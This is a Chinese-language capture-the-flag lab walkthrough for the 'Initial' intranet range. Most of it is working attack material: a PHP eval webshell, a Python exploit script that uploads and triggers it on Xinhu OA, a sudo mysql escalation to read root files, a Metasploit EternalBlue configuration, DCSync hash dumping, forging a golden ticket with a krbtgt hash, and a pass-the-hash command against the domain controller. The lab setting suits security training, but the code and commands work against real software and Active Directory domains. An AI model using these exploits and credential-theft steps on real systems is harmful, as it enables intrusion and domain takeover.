春秋云境—Initial

文章目录

- 春秋云境—Initial
- - - 一、前期准备
    - - 1、靶标介绍
      - 2、相关设备
    - 二、WEB渗透
    - - 1、ThinkPHP RCE
      - （1）、打开网站
        （2）、检测漏洞
      - 2、蚁剑连接
      - 3、sudo提权
      - 4、frpc代理
      - 5、fsacn扫描
    - 三、后渗透
    - - 1、信呼OA RCE
      - （1）、1.php木马
        （2）、exp.py漏洞脚本
        （3）、查看路径
      - 2、蚁剑连接
      - 3、永恒之蓝
      - 4、DCSync
      - （1）、DCSync简介
        （2）、导出域内所有用户Hash
        （3）、生成黄金票据
        （4）、导入黄金票据
        （5）、HASH传递

春秋云境—Initial

一、前期准备

1、靶标介绍

Initial是一套难度为简单的靶场环境，完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag，各部分位于不同的机器上。

2、相关设备

设备名称	IP地址
Web	39.98.120.156 172.22.1.15
XIAORANG-OA01	172.22.1.18
XIAORANG-WIN7	172.22.1.21
DC01	172.22.1.2

二、WEB渗透

1、ThinkPHP RCE

（1）、打开网站

http://39.98.120.156/

在这里插入图片描述

（2）、检测漏洞

在这里插入图片描述

2、蚁剑连接

在这里插入图片描述

3、sudo提权

(www-data:/tmp) $ sudo -l
(www-data:/tmp) $ sudo mysql -e '\! cat /root/flag/flag01.txt'

在这里插入图片描述

4、frpc代理

(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod +x frpc*
(www-data:/tmp) $ ./frpc -c ./frpc.ini

5、fsacn扫描

(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod +x fscan
(www-data:/tmp) $ ./fscan -h 172.22.1.0/24

172.22.1.2:445 open
172.22.1.2:135 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:80 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.18:3306 open
[+] NetInfo:
[*]172.22.1.21[->]XIAORANG-WIN7[->]172.22.1.21
[+] NetInfo:
[*]172.22.1.18[->]XIAORANG-OA01[->]172.22.1.18
[*] WebTitle:http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] 172.22.1.2     [+]DC XIAORANG\DC01              Windows Server 2016 Datacenter 14393
[+] 172.22.1.21	MS17-010	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.21          XIAORANG\XIAORANG-WIN7     Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[+] NetInfo:
[*]172.22.1.2[->]DC01[->]172.22.1.2
[*] 172.22.1.18          XIAORANG\XIAORANG-OA01     Windows Server 2012 R2 Datacenter 9600
[*] WebTitle:http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

三、后渗透

1、信呼OA RCE

（1）、1.php木马

<?php eval($_POST["1"]);?>

（2）、exp.py漏洞脚本

import requestssession = requests.session()url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {'rempass': '0','jmpass': 'false','device': '1625884034525','ltype': '0','adminuser': 'YWRtaW4=','adminpass': 'YWRtaW4xMjM=','yanzm': ''
}r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

（3）、查看路径

在这里插入图片描述

2、蚁剑连接

在这里插入图片描述

3、永恒之蓝

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhost 172.22.1.21
set proxies socks5:116.196.88.132:6001
exploit

4、DCSync

（1）、DCSync简介

在DCSync技术没有出现之前，攻击者要想拿到域内用户的hash，就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash，但是在2015 年 8 月份， Mimkatz新增了一个主要功能叫"DCSync"，使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。

域控制器（DC）是 Active Directory(AD) 域的支柱用于管理域内用户。在现实场景中，为了防止 DC 崩溃导致连带域内瘫痪，会额外布置多台域控制器。当出现了多台域控制器时，为了实现数据同步，不同域控制器（DC）之间每 15 分钟都会有一次域数据的同步，当 DC1 想从 DC2 获取数据时，DC1 会向 DC2 发起GetNCChanges请求，该数据包包含需要同步的数据。

DCSync则是通过上述原理，利用 Directory Replication Service（DRS）服务的GetNCChanges接口向域发起数据同步请求。

windows 域默认可以运行以下组内用户登陆到域控中：

Enterprise Admins (目录林管理员组)
Domain Admins(域管理员组)
Administrators
Backup Operators
Account Operators
Print Operators

如果一个攻击者能够拿下以上组中的一个账户，整个活动目录就可能被攻陷，因为这些用户组有登陆到域控的权限,除此之外，还需要提权到 system 权限。

（2）、导出域内所有用户Hash

load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

在这里插入图片描述

（3）、生成黄金票据

meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt

在这里插入图片描述

（4）、导入黄金票据

kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt

在这里插入图片描述

（5）、HASH传递

proxychains4 impacket-wmiexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 "type Users\Administrator\flag\flag03.txt"

在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/1495.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

春秋云境—Initial

文章目录

春秋云境—Initial

一、前期准备

1、靶标介绍

2、相关设备

二、WEB渗透

1、ThinkPHP RCE

（1）、打开网站

（2）、检测漏洞

2、蚁剑连接

3、sudo提权

4、frpc代理

5、fsacn扫描

三、后渗透

1、信呼OA RCE

（1）、1.php木马

（2）、exp.py漏洞脚本

（3）、查看路径

2、蚁剑连接

3、永恒之蓝

4、DCSync

（1）、DCSync简介

（2）、导出域内所有用户Hash

（3）、生成黄金票据

（4）、导入黄金票据

（5）、HASH传递

相关文章